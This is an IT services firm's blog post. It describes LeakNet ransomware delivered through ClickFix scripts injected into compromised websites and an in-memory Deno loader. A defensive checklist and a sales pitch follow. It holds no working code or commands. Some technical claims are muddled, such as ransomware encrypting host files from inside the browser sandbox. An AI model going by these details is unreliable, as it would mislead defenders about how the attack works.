LeakNet ransomware has resurfaced with a new tactic that combines ClickFix redirection through compromised websites and an in‑memory Deno loader, marking a shift toward file‑less attacks that evade traditional defenses. Threat actors are leveraging legitimate web traffic to deliver malicious payloads, making detection increasingly challenging for SOC teams.

Technical Deep‑Dive: How the ClickFix Chain Operates

The ClickFix technique exploits a family of browser‑side scripts that respond to specific user interactions (such as scrolling or mouse movement) with dynamically generated JavaScript. When a victim lands on a compromised page, the script triggers a hidden redirect to a malicious landing site controlled by the attackers. This redirection occurs without any visible navigation, preserving stealth.

The stage‑1 downloader loads a secondary script that fetches a compressed blob from a remote server.

  • Stage 1 – Web‑based downloader: A lightweight HTML file loads a secondary script that fetches a compressed blob from a remote server.
  • Stage 2 – In‑memory Decompression: The blob contains an encrypted Deno script that is decompressed directly into RAM.
  • Stage 3 – Deno Execution: The Deno runtime interprets the script, spawning a network‑connected process that establishes Command‑and‑Control (C2) communication.
  • Stage 4 – Ransomware Payload: LeakNet encrypts files on the compromised host, appending a unique extension and dropping a ransom note.

Because the entire chain resides only in memory, forensic analysts struggle to locate artifacts on disk, increasing the difficulty of post‑incident analysis.

How Compromised Websites Serve LeakNet and Deno

Attackers typically gain initial foothold by exploiting vulnerable CMS plugins, outdated server‑side scripts, or misconfigured cloud storage buckets. Once breached, they inject the ClickFix script into legitimate pages, often disguising it as a performance‑optimization module.

The injected script leverages document.write and eval to load remote resources without triggering CSP (Content‑Security‑Policy) alerts. By hosting the malicious script on a separate CDN, the attackers can scale their infrastructure and evade blacklist detection.

When a visitor’s browser executes the script, it silently initiates a GET request for the encrypted Deno payload. The payload is fetched over HTTPS, making traffic appear legitimate. Subsequent execution occurs entirely within the browser’s JavaScript sandbox, allowing the ransomware to pivot to credential theft or file encryption without ever touching the file system.

Impact on Modern Organizations

The shift to file‑less, browser‑resident attacks has profound implications for enterprises:

  • Increased Attack Surface: Every external website a user visits becomes a potential entry point.
  • Reduced Visibility: Traditional endpoint detection tools often miss in‑memory activity, leading to slower incident response.
  • Higher Remediation Costs: Because the malware can persist across sessions and evade logging, recovery times lengthen, and operational downtime can be significant.
  • Reputational Damage: A successful breach can erode customer trust, especially if sensitive data is exfiltrated during the ransomware phase.

For IT leaders, the incident underscores the necessity of layered defenses that extend beyond signature‑based detection.

Actionable Defensive Measures – Checklist for IT Administrators

Implement the following steps to reduce risk and improve resilience:

  1. Web Application Firewall (WAF) Hardening: Deploy a WAF that inspects for suspicious JavaScript patterns and blocks known ClickFix signatures.
  2. Content‑Security‑Policy Enforcement: Enable strict CSP headers that disallow inline scripts and eval usage, forcing external resources to be loaded from trusted origins.
  3. Network Segmentation: Isolate critical systems and restrict outbound traffic to only whitelisted domains.
  4. Browser Isolation & Sandboxing: Deploy enterprise browsers with integrated isolation layers that contain potentially malicious scripts.
  5. Endpoint Detection & Response (EDR) Tuning: Configure EDR to monitor for anomalous JavaScript execution and in‑memory anomalies.
  6. Threat Intelligence Integration: Feed feeds that list domains associated with ClickFix redirection into SIEM correlation rules.
  7. User Awareness Training: Educate end‑users on the dangers of visiting unknown sites and the signs of hidden redirects.
  8. Regular Patch Management: Keep CMS platforms, plugins, and server software up to date to eliminate the initial compromise vector.

By systematically applying these controls, organizations can significantly reduce the likelihood of a successful LeakNet infection.

Why Professional IT Management Elevates Security Posture

Engaging seasoned security practitioners provides several strategic advantages:

  • Proactive Threat Hunting: Experts continuously scan for emerging techniques such as ClickFix before they manifest in the wild.
  • Tailored Incident Response: Custom playbooks accelerate containment, limiting lateral movement and data loss.
  • Compliance Alignment: Professional managers ensure that security controls map to industry regulations, reducing audit risk.
  • Technology Roadmaps: They recommend investments in next‑generation defenses (e.g., zero‑trust browsers) that future‑proof the environment.

In short, a partnership with experienced IT service providers transforms reactive security into a strategic, resilient capability that protects both data and brand reputation.

Need Expert IT Advice?

Talk to TH247 today about how we can help your small business with professional IT solutions, custom support, and managed infrastructure.